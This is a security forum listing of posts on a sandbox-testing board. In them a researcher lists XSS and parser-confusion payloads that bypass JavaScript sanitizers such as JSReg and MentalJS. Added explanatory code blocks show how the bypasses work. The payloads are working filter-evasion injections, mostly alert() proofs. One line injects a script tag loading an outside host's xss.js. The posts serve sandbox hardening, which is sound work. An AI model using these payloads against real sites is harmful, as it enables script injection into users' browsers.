Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 

Results 1 - 30 of 170 (page 1 of 6)
8 months ago
LeverOne
I'm starting to test the ruleset. --- Test cases: 0: { // arraycomma 0: 1, // arraycomma + 1: 1, // arr open + 2: 1, // arr close + 3: 1, // AccessorOpen ? 4: 1, // AccessorClose + 14: 1, // Break ? 15: 1, //
Forum: XSS Info
1 year ago
LeverOne
@d0znpp MentalJS is designed to work in IE9+ standards mode.
Forum: XSS Info
1 year ago
LeverOne
1) IE,FF document.body.innerHTML="<script> </script>"; x=document.getElementsByTagName('script')[2].cloneNode(); x.setAttribute('src', 'http://ha.ckers.org/xss.js'); document.body.insertBefore(x,document.body.firstChild); bugs: 1) "There is no native insertAfter method." // 2) if(!allowedTagsRegEx.test(elementNode.nodeName)) {
Forum: XSS Info
1 year ago
LeverOne
document.body.innerHTML="<form onmouseover=alert(location)><input name=attributes>"; // for the third time :)
Forum: XSS Info
1 year ago
LeverOne
FF, IE document.body.innerHTML='<script> </script>'; x=document.getElementsByTagName('script')[2].cloneNode(); x.appendChild(document.createTextNode('1')); x.appendChild(document.createTextNode('/alert(location)/+0')); document.body.appendChild(x); bugs: 1) if(this.parentNode) { // parentNode may not exist, e.g.: document.createElement('div').innerHTML='<script>1
Forum: XSS Info
1 year ago
LeverOne
I'll start looking at it at the weekend.
Forum: XSS Info
1 year ago
LeverOne
1) document.body.innerHTML="<form onmouseover=alert(location) name=body><input>"; 2) FF x=document.createElement('script'); x.innerHTML='{alert(location)}'; x.appendChild(document.createTextNode('+1')); document.body.appendChild(x); 3) !FF // SVGScriptElement document.body.innerHTML="<svg><script></script></svg>"; x=documen
Forum: XSS Info
1 year ago
LeverOne
1) IE 9 document.body.innerHTML='<lo xmlns="><img src=x:xx onerror=alert(location)//"></lo>'; 2) (repetition) document.body.innerHTML="<form onmouseover=alert(location)><input name=attributes>"; 3) Opera document.body.innerHTML="<svg><image></image><style><!-- or any other elements -->image{filter:url
Forum: XSS Info
1 year ago
LeverOne
document.body.innerHTML="<svg><image></image><style></style></svg>"; document.getElementsByTagName('style')[1].textContent='image{filter:url(\'data:image/svg+xml,%3Csvg xmlns=%22http://www.w3.org/2000/svg%22%3E%3Cscript%3Ealert(top.location)%3C/script%3E%3C/svg%3E\')}'; Something similar can be done via innerText + -o-link
Forum: XSS Info
1 year ago
LeverOne
document.body.innerHTML="<form onmouseover=alert(1)><input name=attributes>"; Opera document.body.innerHTML="<svg><image></image><style>image{filter:url('data:image/svg+xml,%3Csvg xmlns=%22http://www.w3.org/2000/svg%22%3E%3Cscript%3Ealert(top.location)%3C/script%3E%3C/svg%3E')}</style></svg>"; IE9 (element.attributes
Forum: XSS Info
1 year ago
LeverOne
eval("1..lo\u2028in\u2028function\u2028()/'/;alert(location)//'"); old problems...
Forum: XSS Info
1 year ago
LeverOne
// not an attack on the technique I agree and I have a very good first impression of the new parser. 1<!--0[0];for(1 function lo(){}/alert(location)/+0<!--0[0];); 01.E+/-0;lo='/+alert(location)//' 07.in/alert(location)/+0
Forum: XSS Info
1 year ago
LeverOne
for(;0;)break typeof/lo;alert(location)/+0 also continue + new, throw, delete, typeof
Forum: XSS Info
1 year ago
LeverOne
1<!--0[0];for(var lo {}/alert(location,i=0)/i<!--lo;);
Forum: XSS Info
2 years ago
LeverOne
function lo(){i// in/1};alert(location)//1} // !Opera var y=function(){},lo // !FF /'/,alert(location)//' this function lo(){}/'/,alert(location)//' var NaN /'/,alert(location)//' // !FF Tests: var i=i /i/i,a var x (x)=123,x /i/i var i {}
Forum: XSS Info
2 years ago
LeverOne
// I consider you an owner of this project Thanks, but I can't agree, because I know I won't be doing commits. Choose a license on your own, please. // have you considered releasing a js parser test suite :) In my opinion it's more fun when "a lot of other parsers have problems". // add me on gtalk I don't use gtalk.
Forum: XSS Info
2 years ago
LeverOne
// Any reason you need it there? I often compare the versions to understand exactly how the problem has been fixed. Sometimes I add my code to see how the input data is overwritten. Sometimes I leave notes in the code to remember in the future. // You might want to wait until I fix a lot of things OK. I see the var statement fix was not complete. I'll follow this thread.
Forum: XSS Info
2 years ago
LeverOne
Thank you! Soon I will look in detail at the new sandbox. At the moment I have three suggestions: 1. Run the hack test on Opera or GC. 2. Do something with "<!--" and "-->". 3. Upload MentalJS to googlecode.
Forum: XSS Info
2 years ago
LeverOne
@Gareth Heyes I added it to the description for #9 few days ago and your link to hackvertor.
Forum: XSS Info
2 years ago
LeverOne
Perhaps it will be useful for you: 1) http://html5sec.org/#9 2) http://html5sec.org/#90 3) http://html5sec.org/#129
Forum: XSS Info
2 years ago
LeverOne
In this post I will list all incorrect changes to the original code (syntactic violations) which exist in the current version of JSReg. You can edit this post. 1) this['f$oo']=1;'$f'+'oo' in this; // operator precedence must be taken into account here 2) switch(1){case 1:{} // <-- should be parsed as a block. } 3) switch(1){default:{} // <-- should be parsed as
Forum: XSS Info
2 years ago
LeverOne
if(1)/**/{}/'//*'+function{1:lo}/'/,alert(parent.location))//*/-/'/ lo='@mozilla.org/js/function'; 1<!--0[0];alert(lo: :['location']); `if(1)/**/` and `<!--` are just some of the options for hiding the wrong code at the initial syntax-checking stage. Most of the violations listed in the next post can be used for this purpose.
Forum: XSS Info
2 years ago
LeverOne
// 109 function(a,b,c,d,e){for(d=e='';a||(b='=',d%1);e+=b[63&c>>8-d%1*8])c=c<<8|a.charCodeAt(d-=-.75);return e}
Forum: Obfuscation
2 years ago
LeverOne
As I said above, I'll return to JSReg in March or April 2012. I want to finish my look at it too, but I'm busy.
Forum: XSS Info
3 years ago
LeverOne
0?lo:/='/,alert(parent.location)//' switch(1){case 1:{}/'lo/,alert(parent.location)}//'} // default:{} <-- the same bugs: 1. i=1;i++ {} 2. http://code.google.com/p/jsreg/source/browse/trunk/JSReg/JSReg.js#612 3. ~{} ---- // I've stopped thinking about it, but ideas still come to me. Preventing future bypasses via unsupported statements. When browsers implement
Forum: XSS Info
3 years ago
LeverOne
0?/='lo/i:alert(parent.location)//'
Forum: XSS Info
3 years ago
LeverOne
1?{}:/='lo/,alert(parent.location)//' ~{x:/='/,lo:alert(parent.location)}//'
Forum: XSS Info
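The two bypass patterns above share one root cause: the filter decides what a `/` (or a `'`) means without tracking the parser state the engine will actually be in. As an added illustration that is not code from this thread, nor from JSReg or MentalJS, the block below uses the engine's own parser as the oracle: it compiles a source with the Function constructor, with `alert`, `location` and `parent` replaced by recording stand-ins (all constructed for the demo), and asks whether `alert` really gets called. It then reproduces (1) the cloneNode/createTextNode post, where each text node of a script is harmless on its own but the concatenation the engine runs is not, and (2) the `0?/='lo/i:alert(...)//'` payloads, where a toy filter that assumes `'` opens a string misses a call hidden inside a regex literal. The names `runWithSpy`, `perNodeCalls`, `joinedCalls` and `naiveFilterFlags` are mine.

```javascript
// Added example for this listing; not code from the thread or from JSReg/MentalJS.
// Runs a JavaScript source with `alert`, `location` and `parent` replaced by
// recording stand-ins (constructed values), so "does this source really call
// alert?" can be answered in Node.js, using the engine's own parser as the oracle.

function runWithSpy(src) {
  const calls = [];
  const alertSpy = (v) => { calls.push(String(v)); };
  const fakeLocation = 'http://example.invalid/';   // constructed stand-in
  const fakeParent = { location: fakeLocation };    // constructed stand-in
  let fn;
  try {
    // Same parser the page would use; the body is the exact source under test.
    fn = new Function('alert', 'location', 'parent', src);
  } catch (e) {
    if (e instanceof SyntaxError) return { valid: false, error: e.name, alertCalls: calls };
    throw e;
  }
  let error = null;
  try {
    fn(alertSpy, fakeLocation, fakeParent);
  } catch (e) {
    error = e.name;   // a runtime error after the call does not undo the call
  }
  return { valid: true, error, alertCalls: calls };
}

// Failure mode 1: validating each text node of a <script> separately.
function perNodeCalls(textNodes) {
  return textNodes.map((node) => runWithSpy(node).alertCalls.length);
}
function joinedCalls(textNodes) {
  // A <script> runs script.text, i.e. the concatenation of all its text nodes.
  return runWithSpy(textNodes.join('')).alertCalls.length;
}

// Failure mode 2: a toy filter that strips what it believes are string
// literals and then looks for alert(. It never asks whether the `'` it saw
// sits inside a regex literal, which is exactly the blind spot the payloads use.
function naiveFilterFlags(src) {
  const withoutStrings = src.replace(/'[^']*'/g, "''");
  return /\balert\s*\(/.test(withoutStrings);
}

// Sample inputs taken from the posts in this listing.
const TEXT_NODES = ['1', '/alert(location)/+0'];
const REGEX_PAYLOADS = [
  "0?/='lo/i:alert(parent.location)//'",
  "1?{}:/='lo/,alert(parent.location)//'",
];

function demo() {
  return {
    perNode: perNodeCalls(TEXT_NODES),   // [0, 0]: each node is harmless on its own
    joined: joinedCalls(TEXT_NODES),     // 1: "1/alert(location)/+0" divides by alert(...)
    naive: REGEX_PAYLOADS.map(naiveFilterFlags),                          // [false, false]
    engine: REGEX_PAYLOADS.map((p) => runWithSpy(p).alertCalls.length),   // [1, 1]
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

The lesson for a sandbox author is the one LeverOne keeps making in this thread: the only source worth checking is the exact string the engine will execute, parsed with the same regex-versus-division and string-versus-comment decisions the engine makes; checking fragments, or checking a rewritten copy, leaves a gap between what was inspected and what runs.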
3 years ago
LeverOne
I suggest adding these non-FF spaces \u202f, \u205f to the spaceChars regex and doing something with the literal characters \u1680,\u180e,\u0085 (spaces in IE6-8) and \u0000,\ufffe \ufeff during normalization. bugs: 1. http://code.google.com/p/jsreg/source/browse/trunk/JSReg/JSReg.js#196 2. variable regex has an invalid structure: /(?:[^\x00-\x7f[ \f\n\r\u000b\u2028\u2029]+... 3. this['f$oo']=1
Forum: XSS Info
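The post above is about a mismatch between the filter's hand-written whitespace class and what the target engine treats as a token separator, and that set differs between engines and versions (hence the separate IE6-8 list). Rather than trusting a regex, the added example below (mine, not code from the thread or from JSReg) asks the running engine directly: it compiles `var _probe<CH>= 1; return _probe;` with the Function constructor and reads the outcome. A successful return means CH separated the two tokens; a ReferenceError means CH was absorbed into the identifier; a SyntaxError means CH is neither. `classifyChar`, `whitespaceTable`, `mismatches`, the candidate list and the deliberately narrow `NARROW_SPACE_RE` are all constructed for the demo.

```javascript
// Added example, not code from the thread or from JSReg: probe how the running
// engine classifies a character placed between two tokens, instead of trusting
// a hand-written spaceChars regex. The engine's own parser is the only
// authoritative answer, and it differs between browser versions.
//
// Method: compile `var _probe<CH>= 1; return _probe;`.
//   compiles and returns 1   -> CH separated `_probe` from `=`: whitespace or a line terminator
//   compiles, ReferenceError -> CH was absorbed into the identifier (`_probe<CH>` declared, `_probe` not)
//   SyntaxError              -> CH is neither whitespace nor an identifier character
function classifyChar(ch) {
  let fn;
  try {
    fn = new Function('var _probe' + ch + '= 1; return _probe;');
  } catch (e) {
    if (e instanceof SyntaxError) return 'invalid';
    throw e;
  }
  try {
    return fn() === 1 ? 'separator' : 'unexpected';
  } catch (e) {
    if (e instanceof ReferenceError) return 'identifier';
    throw e;
  }
}

// Code points named in the post, plus a few reference points (constructed list).
const CANDIDATES = {
  'U+0020 SPACE': '\u0020',
  'U+00A0 NO-BREAK SPACE': '\u00a0',
  'U+0085 NEXT LINE': '\u0085',
  'U+1680 OGHAM SPACE MARK': '\u1680',
  'U+180E MONGOLIAN VOWEL SEPARATOR': '\u180e',   // verdict varies with the engine's Unicode version
  'U+2028 LINE SEPARATOR': '\u2028',
  'U+202F NARROW NO-BREAK SPACE': '\u202f',
  'U+205F MEDIUM MATHEMATICAL SPACE': '\u205f',
  'U+FEFF ZERO WIDTH NO-BREAK SPACE': '\ufeff',
  'U+0000 NULL': '\u0000',
  'U+FFFE NONCHARACTER': '\ufffe',
};

// Verdict of this engine for every candidate.
function whitespaceTable(candidates = CANDIDATES) {
  const table = {};
  for (const [name, ch] of Object.entries(candidates)) table[name] = classifyChar(ch);
  return table;
}

// Compare a filter's idea of whitespace with the engine's. Every code point the
// two disagree on is a place where filter and engine tokenize the same source
// differently, which is the raw material for a bypass.
function mismatches(filterSpaceRe, candidates = CANDIDATES) {
  const out = [];
  for (const [name, ch] of Object.entries(candidates)) {
    const filterSaysSpace = filterSpaceRe.test(ch);
    const engineSaysSpace = classifyChar(ch) === 'separator';
    if (filterSaysSpace !== engineSaysSpace) out.push({ name, filterSaysSpace, engineSaysSpace });
  }
  return out;
}

// A deliberately narrow space class (constructed for the demo, not JSReg's):
// ASCII whitespace, NBSP and the two line separators only.
const NARROW_SPACE_RE = /[ \t\v\f\n\r\u00a0\u2028\u2029]/;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(whitespaceTable());
  console.log(mismatches(NARROW_SPACE_RE));
}
```

Run under Node the table shows \u202f, \u205f, \u1680 and \ufeff as separators (so the narrow class misses them) and \u0085, \u0000 and \ufffe as invalid; run the same probe inside each browser the sandbox must protect, since the classification of a character such as \u180e changed across engine versions.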
3 years ago
LeverOne
Quote: Can you break it?
Don't worry, I will tell you if I can't break it. When will I say I can't break it? Not before I have analyzed each line of your code. It will not be quick.
IE 6-8 (or their compatibility modes)
with({'if':function(){}})if
(1)/'/+/*'+alert(window[//
),('location' ])+/lo*/i
Explanation: For IE6-8 chars "\u2028" and "\u2029" and o
Forum: XSS Info
3 years ago
LeverOne
Quote: I've decided to add a space after < or > so window<!--window becomes $window$< !--$window$ and window-->window becomes $window$-- >$window$.
Any modification to the original code (that changes a syntactic group) without a syntax check is dangerous. Look: 1<!--)(i
Quote: Where can you hide that payload now?
alert(window)
Forum: XSS Info